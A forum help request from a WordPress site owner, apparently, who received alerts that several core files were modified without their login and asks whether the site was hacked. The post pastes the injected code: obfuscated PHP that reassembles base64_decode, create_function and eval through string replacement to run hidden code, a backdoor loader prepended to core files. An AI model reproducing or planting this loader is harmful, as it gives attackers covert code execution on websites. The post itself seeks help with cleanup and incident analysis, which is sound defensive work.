In the last 2 days, I have received alerts on 3 of my websites saying the core files have been modifed:
WordPress core file modified: index.php
* WordPress core file modified: wp-admin/index.php
* WordPress core file modified: wp-includes/functions.php
* WordPress core file modified: wp-includes/template.php
* WordPress core file modified: wp-includes/theme-compat/header.php
I had not logged into any of the sites or made any changes.
I did not receive any notification that someone else attempted to login (although that's happened in the past)
Is there any legitimate reason or way these files could get modified?
I have changed all passwords and reverted modified files back to what they were, but I'm trying to figure out if I've been hacked. There are no noticeable changes to my sites.
Here is an example of the modification:
From this: <?php
To this:
<?php function pQDKqQFqi7qaqYg5V2Gzrta($Fc9ic5e6,$JG2pbix8zypnEk9x,$zO9z7jB7sE2xA){return str_replace($Fc9ic5e6,$JG2pbix8zypnEk9x,$zO9z7jB7sE2xA);} function W9CB91tIfO7WKNyXLb1bQ8a5($Fc9ic5e6,$JG2pbix8zypnEk9x,$zO9z7jB7sE2xA){return str_replace($Fc9ic5e6,$JG2pbix8zypnEk9x,$zO9z7jB7sE2xA);} function k5QLm7MdAOh8p73UHQK($Fc9ic5e6,$JG2pbix8zypnEk9x,$zO9z7jB7sE2xA){return str_replace($Fc9ic5e6,$JG2pbix8zypnEk9x,$zO9z7jB7sE2xA);} $SbldIWy3T = 'bReBIKsKkuIYEaReBIKsKkuIYEsReBIKsKkuIYEeReBIKsKkuIYE6ReBIKsKkuIYE4ReBIKsKkuIYE_ReBIKsKkuIYEdReBIKsKkuIYEeReBIKsKkuIYEcReBIKsKkuIYEoReBIKsKkuIYEdReBIKsKkuIYEe'; $SbldIWy3T = k5QLm7MdAOh8p73UHQK('ReBIKsKkuIYE','',$SbldIWy3T); $Zl4eiu = 'cWKs4qqa1DcdHK0rWKs4qqa1DcdHK0eWKs4qqa1DcdHK0aWKs4qqa1DcdHK0tWKs4qqa1DcdHK0eWKs4qqa1DcdHK0_WKs4qqa1DcdHK0fWKs4qqa1DcdHK0uWKs4qqa1DcdHK0nWKs4qqa1DcdHK0cWKs4qqa1DcdHK0tWKs4qqa1DcdHK0iWKs4qqa1DcdHK0oWKs4qqa1DcdHK0n'; $Zl4eiu = k5QLm7MdAOh8p73UHQK('WKs4qqa1DcdHK0','',$Zl4eiu); $DjXKGO5o5K0HLuv6DCuKmG0c = 'uKW0OozpGaz1IoveuKW0OozpGaz1IovvuKW0OozpGaz1IovauKW0OozpGaz1Iovl'; $DjXKGO5o5K0HLuv6DCuKmG0c = k5QLm7MdAOh8p73UHQK('uKW0OozpGaz1Iov','',$DjXKGO5o5K0HLuv6DCuKmG0c); $H7Okr = '$RXPw0uSrPLMaEXvihxhTlp'; $FBCQ8g = $Zl4eiu($H7Okr,$DjXKGO5o5K0HLuv6DCuKmG0c.'('.$SbldIWy3T.'('.$H7Okr.'));'); $FBCQ8g('');?><?php